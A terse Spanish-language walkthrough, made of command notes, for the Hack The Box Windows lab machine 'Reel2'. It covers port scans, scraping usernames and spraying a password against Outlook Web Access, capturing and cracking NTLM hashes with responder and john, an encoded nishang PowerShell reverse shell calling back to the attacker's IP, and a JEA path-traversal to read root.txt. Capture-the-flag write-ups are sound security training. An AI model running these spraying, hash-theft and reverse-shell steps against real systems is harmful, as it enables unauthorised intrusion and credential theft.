Reel2
HTB Windows
nmap -A -p- -oA reel2 10.10.10.210 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA reel2 10.10.10.210
nmap -sU -O -p- -oA reel2-udp 10.10.10.210
ping -c 1 10.10.10.210
nmap -p- --open -T5 -v -n 10.10.10.210
echo "10.10.10.210 reel2.htb" | sudo tee -a /etc/hosts
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.210 -oG allPorts
extractPorts allPorts
nmap -sCV -p80,443,5985,6001,6002,6004,6005,6006,6007,6008,6010,6011,6019,6116,8080 10.10.10.210 -oN targeted
bc targeted -l rb
whatweb http://10.10.10.210:8080
nmap --script http-enum -p80,443,8080 10.10.10.210 -oN webScan
Nos dirigimos a http://10.10.10.210:8080
Llenamos el formulario con la informacion adecuada.
Vamos a seguir al usuario Sven
Al darle click a sven lo podemos seguir en su pagina.
Despues nos dirigimos a la pagina de mensajes.
Queremos agarrar todos los usuarios
curl -s -X GET 'http://10.10.10.210:8080/search?q=' | grep "user_follow_box_a" | awk '{print $4 " " $6}' FS=">" | sed 's/<br @//' | sed 's<\/span//' > users
python /opt/SprayingToolkit/spindrift.py users --format "{f}.{last}" > users_dictionary.txt
python /opt/SprayingToolkit/spindrift.py users --format "{f}.{last}" >> users_dictionary.txt
wfuzz -c --hc=404,403 -t 200 -w /usr/share/SecLists/Discovery/Web-Content/IIS.fuzz.txt https://10.10.10.210/FUZZ
Nos dirigimos a https://10.10.10.210/owa
python /opt/SprayingToolkit/atomizer.py owa 10.10.10.210 'Summer2020' users_dictionary.txt
Las credenciales serian HTB\s.svensson:Summer2020
Esta en sueco.
Le damos click a este boton
Ponemos el siguiente mensaje
Deberias de poner tu ip y darle click donde dice Skicka
responder -I tun0
john --wordlist=/usr/share/wordlists/rockyou.txt hash
evil-winrm -i 10.10.10.210 -u k.svensson -p kittycat1
pwsh
$pass = ConvertTo-SecureString 'kittycat1' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('htb\k.svensson', $pass)
Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate
&{cat ../Desktop/user.txt}
&{ls ../Documents/}
python3 -m http.server 80
cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 .
vim Invoke-PowerShellTcpOneLine.ps1
Cambiar la ip en System.Net.Sockets.TCPClient(“10.10.14.9”,443) de este archivo
cat Invoke-PowerShellTcpOneLine.ps1 | tr -d '\n' | tconv -t utf-16le | base64 -w 0; echo
&{Powershell -e ...}
rlwrap nc -nlvp 443
whoami /priv
[Environment]::Is64BitOperatingSystem
cd Documents
type jea_test_account.psrc | select-string -NotMatch '^#'
type 000003.log | Format-Hex
$pass = ConvertTo-SecureString 'Ab!Q@vcg^%@#1' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\jea_test_account', $pass)
Enter-PSSession -Computer 10.10.10.210 -credential $cred -Authentication Negotiate -ConfigurationName jea_test_account
Check-File C:\ProgramData\..\Users\Administrator\Desktop\root.txt